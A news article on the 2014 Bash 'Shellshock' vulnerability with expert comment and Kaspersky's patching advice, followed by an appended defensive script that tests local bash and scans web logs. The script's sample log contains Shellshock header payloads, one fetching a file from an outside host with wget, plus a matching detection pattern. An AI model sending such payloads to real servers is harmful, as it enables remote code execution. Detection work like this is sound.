Bash 'Shellshock' could be 'more serious than Heartbleed', IoT devices most at risk

Kaspersky offers advice on how to detect and fix the vulnerability

Some industry experts are warning that the newly discovered bug in the Bash command shell found in OS X and Linux could be more serious than the Heartbleed bug that hit earlier this year.

“The ‘Shellshock’ bug is a flaw affecting systems using a software component known as ‘Bash’. The term ‘Bash’ may be unfamiliar to many business owners; however, researchers have estimated up to 500 million systems are affected. These stark figures suggest the bug is far more wide-reaching than the infamous Heartbleed vulnerability. Rated 10/10 for severity, the bug may enable attackers to take control of vulnerable systems,” explained Russell Horton, COO at Elite Telecom.

Joe Hancock, cyber security specialist at AEGIS, believes IoT devices are at risk and may be difficult to fix: “The devices most at risk are those that make up the ‘Internet of Things’ or Industrial Control Systems. Any legacy device that uses a set of web-scripts to interact directly with the underlying Linux operating system via BASH could potentially be remotely monitored or controlled. For example, a major control systems vendor’s Programmable Logic Controllers (PLCs) use the Linux operating system, which has previously been shown to use the BASH software internally. In some areas this will be a challenge to fix, as many embedded devices are not designed with regular updates in mind and will never be able to be patched.”

Not everyone believes that Shellshock poses as much of a threat as Heartbleed. Bitdefender’s senior E-threat specialist, Bogdan Botezatu, has called it a mini-Heartbleed at best: “While the impact might be severe, this is more of a mini-Heartbleed, as exploitation is only possible in certain scenarios on these systems. To start with, remote hackers can only target servers running CGI scripts and pass environment variables, whereas, in Heartbleed’s case, they interacted more easily with the server. Network-based exploitation is also possible, but it is limited to specific scenarios.”

Regardless of how widespread the problem may become, Kaspersky’s senior security researcher, David Jacoby, has detailed how users can check if their system or website has been affected as well as offering advice on how to fix the problem:

“The easiest way to check if your system is vulnerable is to open a bash shell on your system and execute the following command:

    env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

“If the shell returns the string "vulnerable", you should update your system. Also, there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

“[If you're affected] The first thing that you need to do is to update your bash version. Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be really effective yet, patching is the first thing to do.

“If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

“Also review your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.”
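The script below is an added example, not code from the article or from Kaspersky. It wraps the one-line check quoted above in a function, adds a second check for the follow-on parser flaw that the first round of patches left open (the reason a check alone is not proof that a system is fixed), and stands in for the IDS/IPS signature step with a grep over web-server logs. The CVE identifiers (CVE-2014-6271 for the original bug, CVE-2014-7169 for the incomplete fix) are the public ones and are not named in the article; the log lines are constructed sample data, not a real capture.

```bash
#!/bin/sh
# Added example (not from the article or Kaspersky). Run with: sh shellshock_check.sh

# check_shellshock_local [bash-binary]
# Runs the test command quoted in the article against the given bash (default:
# the first "bash" on PATH). A vulnerable bash executes the code that follows
# the function body while importing the variable x, so "vulnerable" shows up in
# the output. Echoes "vulnerable", "patched" or "error" (shell not runnable).
check_shellshock_local() {
    local shell out
    shell="${1:-bash}"
    command -v "$shell" >/dev/null 2>&1 || { echo error; return 0; }
    out="$(env x='() { :;}; echo vulnerable' "$shell" -c "echo this is a test" 2>/dev/null)" || true
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

# check_shellshock_followon [bash-binary]
# The first Shellshock patch was incomplete (CVE-2014-7169). On a bash carrying
# only that fix, parser state leaks out of the imported function so that
# `echo date` is executed as `date` with its output redirected into a file
# literally named "echo" in the current directory. The check runs in a
# throw-away directory and looks for that file.
check_shellshock_followon() {
    local shell dir verdict
    shell="${1:-bash}"
    command -v "$shell" >/dev/null 2>&1 || { echo error; return 0; }
    dir="$(mktemp -d)" || { echo error; return 0; }
    ( cd "$dir" && env X='() { (a)=>\' "$shell" -c "echo date" >/dev/null 2>&1 ) || true
    if [ -e "$dir/echo" ]; then verdict=vulnerable; else verdict=patched; fi
    rm -rf "$dir"
    echo "$verdict"
}

# scan_log_for_shellshock LOGFILE
# Rough log-side equivalent of an IDS/IPS signature: counts requests whose logged
# header fields (User-Agent and Referer in Apache combined format) carry the
# "() {" function-definition prefix that every Shellshock payload needs.
# Caveat: headers Apache does not log by default (Cookie, Host, custom headers)
# are invisible here, which is why a network-level signature is still needed.
scan_log_for_shellshock() {
    grep -cE '\(\) *\{' "$1" || true
}

# build_sample_log
# Writes three constructed combined-format lines (sample data, not a real
# capture) to a temp file and prints its path. Two of the three carry a
# Shellshock payload, one in the User-Agent field and one in the Referer field.
build_sample_log() {
    local f
    f="$(mktemp)" || return 1
    cat >"$f" <<'EOF'
192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.4 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 128 "() { :; }; /usr/bin/wget -O /tmp/x http://203.0.113.9/x" "curl/7.38.0"
EOF
    printf '%s\n' "$f"
}

printf 'local bash, CVE-2014-6271 test: %s\n' "$(check_shellshock_local)"
printf 'local bash, CVE-2014-7169 test: %s\n' "$(check_shellshock_followon)"
sample="$(build_sample_log)"
printf 'requests carrying a Shellshock prefix in the sample log: %s\n' "$(scan_log_for_shellshock "$sample")"
rm -f "$sample"
```

Point the first argument of the two check functions at a specific binary (for example /bin/bash on a recovery image, or the bash shipped inside an appliance firmware mounted on a workstation) to test something other than the host's default shell; the log scan reads any file in combined format, so it can be pointed at an archived access log to look for attempts that predate the patch.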
